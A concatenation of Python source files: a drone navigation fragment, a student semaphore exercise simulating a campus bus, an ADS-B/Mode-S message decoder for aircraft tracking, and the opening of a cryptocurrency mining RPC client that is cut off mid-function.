acquired = self.obstacle_set_mutex.acquire(True) # blocking.
if acquired:
#print('octomap updated!')
self.driver.set_obstacle_set(obs_set)
self.obstacle_set_mutex.release()
return
else:
print ('Lock not acquired!')
def local_pose_callback(self, msg):
pose_ = msg.pose.position #TODO:do fusion with visual slam.
self.local_pose = self.dg.continuous_to_discrete((pose_.x,pose_.y,pose_.z))
#print ('local_pose set!!!')
def get_local_pose(self): # in mavros axis.for command.
#print ('self.local_pose',self.local_pose)
return self.local_pose
def get_current_pose(self): # current pose:slam pose(in world axis)
return self.get_local_pose() # TODO:do transform T1 ^-1 * T2.
'''
helper functions
'''
def set_status(self, status):
self.STATUS = String(status.name)
'''
def reachTargetPosition(self, target, threshold = 0.1):
delta_x = math.fabs(self.local_pose.pose.position.x - target.pos_sp[0])
delta_y = math.fabs(self.local_pose.pose.position.y - target.pos_sp[1])
delta_z = math.fabs(self.local_pose.pose.position.z - target.pos_sp[2])
distance = (delta_x + delta_y + delta_z)
print("distance: ", distance, "threshold: ", threshold)
if distance < threshold:
return True
else:
return False
'''
def setMavMode(self, msg):
pass
if __name__ == '__main__':
nav = Navigator()
    nav.set_target_position((20, 0, 2))
nav.keep_navigating()
|
Pumabus_Paw_Luis.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Written by Brenda Paola Lara Moreno | Luis Arvizu
# Sistop-2019-2 | FI-UNAM |
# Implemented exercise: Pumabus
# Language: Python
# This program was developed with Python 2.7.10
# To run it you need Python: open a terminal, change to the directory where the
# file is saved, and then run it as follows ----> python Pumabus_Paw_Luis.py
import time
import threading
global minutos
global personas
minutos = 0 # counter for the elapsed minutes
personas = 0 # counter for the number of people in line
# Message strings are declared as variables to keep the code short and reuse them when printing
llegada = 'Llega un '
pumaInactivo = ' Pumabus Estacionado\n'
total = 'Total de '
arrancaPumabus = 'Encendiendo Pumabus...'
mutex = threading.Semaphore(1)
pumaBus = threading.Semaphore(0)
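# Synchronization overview: `mutex` protects the shared counters `personas` and
# `minutos`, while `pumaBus` starts at 0 and is released by whichever condition
# is met first (15 people in line or 25 elapsed minutes); the PumaBus thread
# blocks on pumaBus.acquire() until one of those releases happens.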
# Function definitions
def Recorrido(): # Runs the route-1 trip
print '»------(¯` Inicia Recorrido ´¯)------»'
time.sleep(2)
print '*'
print '*'
print '*'
print '*'
print '»------(¯` Termina Recorrido ´¯)------»'
def Personas():
global personas
mutex.acquire()
    personas += 1 # Adds a person joining the line
    print (llegada + 'Persona') + '\n' + (total) + 'Personas = %d' %(personas)
    if personas == 15: # If 15 people are in line, the Pumabus departs
pumaBus.release()
mutex.release()
def Minutos():
global minutos
mutex.acquire()
    minutos += 1 # Adds another "minute" that has gone by
    print 'Ha pasado un minuto' + '\n' + (total) + 'Minutos = %d' %(minutos)
    if minutos == 25: # If 25 minutes have passed, the Pumabus departs
pumaBus.release()
mutex.release()
def PumaBus():
global minutos
global personas
while True:
pumaBus.acquire()
print (arrancaPumabus)
mutex.acquire()
        if minutos == 25: # If 25 minutes have passed, the Pumabus departs
print (arrancaPumabus)
Recorrido()
            minutos -= 25 # Empties the minutes counter
personas -= personas
elif personas >= 15:
Recorrido()
            personas -= 15 # Removes the 15 people who left on the Pumabus from the counter
print (pumaInactivo)
mutex.release()
# Define how often each thread runs
threading.Thread(target = PumaBus, args = []).start()
while True:
threading.Thread(target = Personas, args = []).start()
time.sleep(0.5)
threading.Thread(target = Minutos, args = []).start()
time.sleep(0.5)
|
decode.py
|
# fmt: off
import logging
import os
import signal
import socket
import threading
from collections import UserDict
from datetime import datetime, timedelta, timezone
from operator import itemgetter
from pathlib import Path
from typing import (
Any, Callable, Dict, Iterable, Iterator,
List, Optional, TextIO, Tuple, Union
)
import pandas as pd
import pyModeS as pms
from tqdm.autonotebook import tqdm
from ...core import Flight, Traffic
from ...data.basic.airports import Airport
# fmt: on
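# Framing handled by next_msg() below: the input is a Mode-S Beast binary
# stream in which every frame starts with the escape byte 0x1A followed by a
# type byte -- 0x31 for a Mode-A/C frame (11 bytes in total), 0x32 for a short
# Mode-S frame (16 bytes), 0x33 for a long Mode-S frame (23 bytes) and 0x34 for
# a status frame. Only the 23-byte long frames are yielded to the decoder.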
def next_msg(chunk_it: Iterator[bytes]) -> Iterator[bytes]:
data = b""
for chunk in chunk_it:
data += chunk
while len(data) >= 23:
it = data.find(0x1A)
if it < 0:
break
data = data[it:]
if len(data) < 23:
break
if data[1] == 0x33:
yield data[:23]
data = data[23:]
continue
elif data[1] == 0x32:
data = data[16:]
continue
elif data[1] == 0x31:
data = data[11:]
continue
elif data[1] == 0x34:
data = data[23:]
continue
else:
data = data[1:]
def decode_time_default(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
return datetime.now(timezone.utc)
def decode_time_radarcape(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
timestamp = int(msg[4:16], 16)
nanos = timestamp & 0x00003FFFFFFF
secs = timestamp >> 30
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
now += timedelta(seconds=secs, microseconds=nanos / 1000)
return now
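# Timestamp layout assumed above: msg[4:16] is a 48-bit field whose upper
# 18 bits are seconds since midnight and whose lower 30 bits are nanoseconds.
# Worked example: timestamp = (3600 << 30) | 500000000 decodes to secs=3600 and
# nanos=5e8, i.e. 01:00:00.500000 on the reference day.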
def decode_time_dump1090(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
else:
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
timestamp = int(msg[4:16], 16)
# dump1090/net_io.c => time (in 12Mhz ticks)
now += timedelta(seconds=timestamp / 12e6)
return now
decode_time: Dict[str, Callable[[str, Optional[datetime]], datetime]] = {
"radarcape": decode_time_radarcape,
"dump1090": decode_time_dump1090,
"default": decode_time_default,
}
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the to_be_stopped() condition."""
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.daemon = True # is it redundant?
self._stop_event = threading.Event()
def stop(self) -> None:
self._stop_event.set()
def to_be_stopped(self) -> bool:
return self._stop_event.is_set()
class Aircraft(object):
def __init__(self, icao24: str, lat0: float, lon0: float) -> None:
self.icao24 = icao24
self._callsign: Optional[str] = None
self._flight: Optional[Flight] = None
self.cumul: List[Dict] = []
self.t0: Optional[datetime] = None
self.t1: Optional[datetime] = None
self.tpos: Optional[datetime] = None
self.m0: Optional[str] = None
self.m1: Optional[str] = None
self.lat: Optional[float] = None
self.lon: Optional[float] = None
self.alt: Optional[float] = None
self.trk: Optional[float] = None
self.spd: Optional[float] = None
self.lat0: float = lat0
self.lon0: float = lon0
self.version: Optional[int] = None
self.nic_a: Optional[int] = None
self.nic_bc: Optional[int] = None
self.nic_s: Optional[int] = None
self.lock = threading.Lock()
@property
def flight(self) -> Optional[Flight]:
with self.lock: # access then clear not thread-safe, hence the lock
df = pd.DataFrame.from_records(self.cumul)
self.cumul.clear()
if self._flight is not None:
df = pd.concat([self._flight.data, df], sort=False)
if self.version is not None:
# remove columns added by nuc_p, nuc_r
if "HPL" in df.columns:
df = df.drop(columns=["HPL", "RCu", "RCv"])
if "HVE" in df.columns:
df = df.drop(columns=["HVE", "VVE"])
if len(df) == 0:
return None
self._flight = Flight(
df.assign(
callsign=df.callsign.replace("", None)
.fillna(method="ffill")
.fillna(method="bfill")
)
)
return self._flight
@property
def callsign(self):
return self._callsign
@callsign.setter
def callsign(self, args):
t, msg = args
callsign = pms.adsb.callsign(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, callsign=self._callsign)
)
@property
def speed(self):
pass
@speed.setter
def speed(self, args):
t, msg = args
vdata = pms.adsb.velocity(msg)
if vdata is None:
return
spd, trk, roc, tag = vdata
if tag != "GS":
# does it ever happen...
return
if (spd is None) or (trk is None):
return
self.spd = spd
self.trk = trk
delta = pms.adsb.altitude_diff(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
groundspeed=spd,
track=trk,
vertical_rate=roc,
)
)
if delta is not None and self.alt is not None:
self.cumul[-1]["geoaltitude"] = self.alt + delta
@property
def position(self):
pass
@position.setter
def position(self, args):
t, msg = args
oe = pms.adsb.oe_flag(msg)
setattr(self, "m" + str(oe), msg)
setattr(self, "t" + str(oe), t)
if (
self.t0 is not None
and self.t1 is not None
and abs((self.t0 - self.t1).total_seconds()) < 10
):
latlon = pms.adsb.position(
self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0
)
else:
latlon = None
if latlon is not None:
self.tpos = t
self.lat, self.lon = latlon
self.alt = pms.adsb.altitude(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
altitude=self.alt,
onground=False,
)
)
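    # Airborne ADS-B positions are CPR-encoded, so an unambiguous global
    # position needs one "even" and one "odd" frame received close together
    # (within 10 seconds here, tracked through m0/t0 and m1/t1) before
    # pms.adsb.position() can be evaluated with the reference lat0/lon0.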
@property
def surface(self):
pass
@surface.setter
def surface(self, args):
t, msg = args
self.lat, self.lon = pms.adsb.surface_position_with_ref(
msg, self.lat0, self.lon0
)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
onground=True,
)
)
@property
def altcode(self):
pass
@altcode.setter
def altcode(self, args):
t, msg = args
self.alt = pms.common.altcode(msg)
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, altitude=self.alt)
)
@property
def idcode(self):
pass
@idcode.setter
def idcode(self, args):
t, msg = args
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
squawk=pms.common.idcode(msg),
)
)
@property
def bds20(self):
pass
@bds20.setter
def bds20(self, args):
t, msg = args
callsign = pms.commb.cs20(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(**last_entry, callsign=self._callsign)
else:
self.cumul.append(
dict(
timestamp=t, icao24=self.icao24, callsign=self._callsign
)
)
@property
def bds40(self):
pass
@bds40.setter
def bds40(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
)
@property
def bds44(self):
pass
@bds44.setter
def bds44(self, args):
t, msg = args
wind = pms.commb.wind44(msg)
wind = wind if wind is not None else (None, None)
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
)
@property
def bds45(self):
pass
@bds45.setter
def bds45(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
)
@property
def bds50(self):
pass
@bds50.setter
def bds50(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
)
@property
def bds60(self):
pass
@bds60.setter
def bds60(self, args):
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict(
**last_entry,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
)
@property
def nuc_p(self):
pass
@nuc_p.setter
def nuc_p(self, args):
t, msg = args
with self.lock:
hpl, rcu, rcv = pms.adsb.nuc_p(msg)
current = dict(
# Horizontal Protection Limit
HPL=hpl,
# 95% Containment Radius on horizontal position error
RCu=rcu,
# 95% Containment Radius on vertical position error
RCv=rcv,
)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nic_v1(self):
pass
@nic_v1.setter
def nic_v1(self, args):
t, msg = args
if self.nic_s is None:
return
with self.lock:
hcr, vpl = pms.adsb.nic_v1(msg, self.nic_s)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr,
# Vertical Protection Limit
VPL=vpl,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nic_v2(self):
pass
@nic_v2.setter
def nic_v2(self, args):
t, msg = args
if self.nic_a is None or self.nic_bc is None:
return
with self.lock:
hcr = pms.adsb.nic_v2(msg, self.nic_a, self.nic_bc)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nuc_r(self):
pass
@nuc_r.setter
def nuc_r(self, args):
t, msg = args
with self.lock:
hve, vve = pms.adsb.nuc_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Velocity Error
HVE=hve,
# Vertical Velocity Error
VVE=vve,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nac_v(self):
pass
@nac_v.setter
def nac_v(self, args):
t, msg = args
with self.lock:
hfm, vfm = pms.adsb.nac_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Figure of Merit for rate (GNSS)
HFM=hfm,
# Vertical Figure of Merit for rate (GNSS)
VFM=vfm,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def nac_p(self):
pass
@nac_p.setter
def nac_p(self, args):
t, msg = args
with self.lock:
epu, vepu = pms.adsb.nac_p(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Estimated Position Uncertainty
EPU=epu,
# Vertical Estimated Position Uncertainty
VEPU=vepu,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
@property
def sil(self):
pass
@sil.setter
def sil(self, args):
t, msg = args
with self.lock:
phcr, pvpl, base = pms.adsb.sil(msg, self.version)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
version=self.version,
# Probability exceeding Horizontal Containment Radius
pHCR=phcr,
# Probability exceeding Vertical Protection Limit
pVPL=pvpl,
sil_base=base,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current}
else:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, **current)
)
class AircraftDict(UserDict):
lat0: float
lon0: float
def __missing__(self, key):
self[key] = value = Aircraft(key, self.lat0, self.lon0)
return value
def set_latlon(self, lat0, lon0):
self.lat0 = lat0
self.lon0 = lon0
for ac in self.values():
ac.lat0 = lat0
ac.lon0 = lon0
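# Usage sketch for AircraftDict (hedged illustration; the coordinates and the
# ICAO address below are placeholders, not values taken from this module):
#
#   acs = AircraftDict()
#   acs.set_latlon(43.6, 1.45)   # reference position used when decoding positions
#   ac = acs["4ca1fa"]           # __missing__ creates the Aircraft on first access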
class Decoder:
thread: Optional[StoppableThread]
def __init__(
self, reference: Union[None, str, Airport, Tuple[float, float]] = None
) -> None:
if isinstance(reference, str):
from ...data import airports
reference = airports[reference]
if reference is None:
logging.warning(
"No valid reference position provided. Fallback to (0, 0)"
)
lat0, lon0 = 0.0, 0.0
elif isinstance(reference, Airport):
lat0, lon0 = reference.latlon
else:
lat0, lon0 = reference
self.acs: AircraftDict = AircraftDict()
self.acs.set_latlon(lat0, lon0)
self.thread = None
@classmethod
def from_file(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, Tuple[float, float]],
uncertainty: bool = False,
) -> "Decoder":
if isinstance(filename, str):
filename = Path(filename)
with filename.open("r") as fh:
all_lines = fh.readlines()
decoder = cls(reference)
decoder.process_msgs(
list(
(
datetime.fromtimestamp(
float(line.strip().split(",")[0]), timezone.utc
),
line.strip().split(",")[1][18:].encode(),
)
for line in all_lines
),
uncertainty=uncertainty,
)
return decoder
@classmethod
def from_binary(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, Tuple[float, float]],
*,
uncertainty: bool = False,
time_fmt: str = "dump1090",
time_0: Optional[datetime] = None,
redefine_mag: int = 10,
fh: Optional[TextIO] = None,
):
decoder = cls(reference)
redefine_freq = 2 ** redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_binary(filename: Union[str, Path]) -> Iterator[bytes]:
with Path(filename).open("rb") as fh:
while True:
get = fh.read()
if len(get) == 0:
return
yield get
for i, bin_msg in tqdm(enumerate(next_msg(next_in_binary(filename)))):
if len(bin_msg) < 23:
continue
msg = "".join(["{:02x}".format(t) for t in bin_msg])
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if i & redefine_freq == redefine_freq:
decoder.redefine_reference(now)
decoder.process(now, msg[18:].encode(), uncertainty=uncertainty)
return decoder
@classmethod
def from_rtlsdr(
cls,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
from .rtlsdr import MyRtlReader
decoder = cls(reference)
# dump file
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
fh = open(today, "a", 1)
rtlsdr = MyRtlReader(decoder, fh, uncertainty=uncertainty)
decoder.thread = StoppableThread(target=rtlsdr.run)
signal.signal(signal.SIGINT, rtlsdr.stop)
decoder.thread.start()
return decoder
@classmethod
def from_socket(
cls,
socket: socket.socket,
reference: Union[str, Airport, Tuple[float, float]],
*,
uncertainty: bool,
time_fmt: str = "default",
time_0: Optional[datetime] = None,
redefine_mag: int = 7,
fh: Optional[TextIO] = None,
) -> "Decoder": # coverage: ignore
decoder = cls(reference)
redefine_freq = 2 ** redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_socket() -> Iterator[bytes]:
while True:
if decoder.thread is None or decoder.thread.to_be_stopped():
socket.close()
return
yield socket.recv(2048)
def decode():
for i, bin_msg in enumerate(next_msg(next_in_socket())):
msg = "".join(["{:02x}".format(t) for t in bin_msg])
# Timestamp decoding
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if len(bin_msg) < 23:
continue
if (
time_fmt != "radarcape"
and i & redefine_freq == redefine_freq
):
decoder.redefine_reference(now)
decoder.process(now, msg[18:].encode(), uncertainty=uncertainty)
decoder.thread = StoppableThread(target=decode)
decoder.thread.start()
return decoder
def stop(self):
if self.thread is not None and self.thread.is_alive():
self.thread.stop()
self.thread.join()
def __del__(self):
self.stop()
@classmethod
def from_dump1090(
cls,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 30005))
fh = open(today, "a", 1)
return cls.from_socket(
s,
reference,
uncertainty=uncertainty,
time_fmt="dump1090",
time_0=now,
fh=fh,
)
@classmethod
def from_address(
cls,
host: str,
port: int,
reference: Union[str, Airport, Tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv",
uncertainty: bool = False,
) -> "Decoder": # coverage: ignore
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
fh = open(today, "a", 1)
return cls.from_socket(
s, reference, uncertainty=uncertainty, time_fmt="radarcape", fh=fh
)
def redefine_reference(self, time: datetime) -> None:
pos = list(
(ac.lat, ac.lon)
for ac in self.acs.values()
if ac.alt is not None
and ac.alt < 5000
and ac.tpos is not None
and (time - ac.tpos).total_seconds() < 20 * 60
)
n = len(pos)
if n > 0:
self.acs.set_latlon(
sum(a[0] for a in pos) / n, sum(a[1] for a in pos) / n
)
def process_msgs(
self, msgs: Iterable[Tuple[datetime, bytes]], uncertainty: bool = False
) -> None:
for i, (time, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)):
if i & 127 == 127:
self.redefine_reference(time)
self.process(time, msg, uncertainty=uncertainty)
def process(
self,
time: datetime,
msg: bytes,
*args,
uncertainty: bool = False,
spd: Optional[float] = None,
trk: Optional[float] = None,
alt: Optional[float] = None,
) -> None:
ac: Aircraft
if len(msg) != 28:
return
df = pms.df(msg)
if df == 4 or df == 20:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.altcode = time, msg
if df == 5 or df == 21:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.idcode = time, msg
if df == 17 or df == 18: # ADS-B
if pms.crc(msg, encode=False) != 0:
return
tc = pms.adsb.typecode(msg)
icao = pms.icao(msg)
# before it's fixed in pyModeS release...
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if 1 <= tc <= 4:
ac.callsign = time, msg
if 5 <= tc <= 8:
ac.surface = time, msg
if tc == 19:
ac.speed = time, msg
if 9 <= tc <= 18:
# This is barometric altitude
ac.position = time, msg
if 20 <= tc <= 22:
# Only GNSS altitude
pass
if not uncertainty:
return
if 9 <= tc <= 18:
ac.nic_bc = pms.adsb.nic_b(msg)
if (5 <= tc <= 8) or (9 <= tc <= 18) or (20 <= tc <= 22):
ac.nuc_p = time, msg
if ac.version == 1:
ac.nic_v1 = time, msg
elif ac.version == 2:
ac.nic_v2 = time, msg
if tc == 19:
ac.nuc_r = time, msg
if ac.version in [1, 2]:
ac.nac_v = time, msg
if tc == 29:
ac.sil = time, msg
ac.nac_p = time, msg
if tc == 31:
ac.version = pms.adsb.version(msg)
ac.sil = time, msg
ac.nac_p = time, msg
if ac.version == 1:
ac.nic_s = pms.adsb.nic_s(msg)
elif ac.version == 2:
ac.nic_a, ac.nic_bc = pms.adsb.nic_a_c(msg)
elif df == 20 or df == 21:
bds = pms.bds.infer(msg)
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if bds == "BDS20":
ac.bds20 = time, msg
return
if bds == "BDS40":
ac.bds40 = time, msg
return
if bds == "BDS44":
ac.bds44 = time, msg
return
if bds == "BDS45":
ac.bds45 = time, msg
return
if bds == "BDS50,BDS60":
if spd is not None and trk is not None and alt is not None:
bds = pms.bds.is50or60(msg, spd, trk, alt)
elif (
ac.spd is not None
and ac.trk is not None
and ac.alt is not None
):
bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt)
else:
return
# do not return!
if bds == "BDS50":
ac.bds50 = time, msg
return
if bds == "BDS60":
ac.bds60 = time, msg
return
@property
def aircraft(self) -> List[Dict[str, Any]]:
return sorted(
(
dict(
icao24=key,
callsign=ac.callsign,
length=(
(len(ac.cumul) + len(ac._flight))
if ac._flight is not None
else len(ac.cumul)
),
position=ac.lat is not None,
data=ac,
)
for (key, ac) in self.acs.items()
if ac.callsign is not None
),
key=itemgetter("length"),
reverse=True,
)
@property
def traffic(self) -> Optional[Traffic]:
try:
return Traffic.from_flights(
self[elt["icao24"]] for elt in self.aircraft
)
except ValueError:
return None
def __getitem__(self, icao: str) -> Optional[Flight]:
return self.acs[icao].flight
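# Usage sketch for the Decoder above (hedged illustration; the file name and the
# ICAO address are placeholders). from_file parses the "timestamp,message" CSV
# dump written by from_binary/from_socket:
#
#   decoder = Decoder.from_file("adsb_dump.csv", reference="LFBO")
#   print(decoder.aircraft[:3])    # most talkative aircraft first (see property above)
#   flight = decoder["4ca1fa"]     # per-aircraft Flight, or None (see __getitem__)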
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The EvolveChain developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class EvolveChainRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
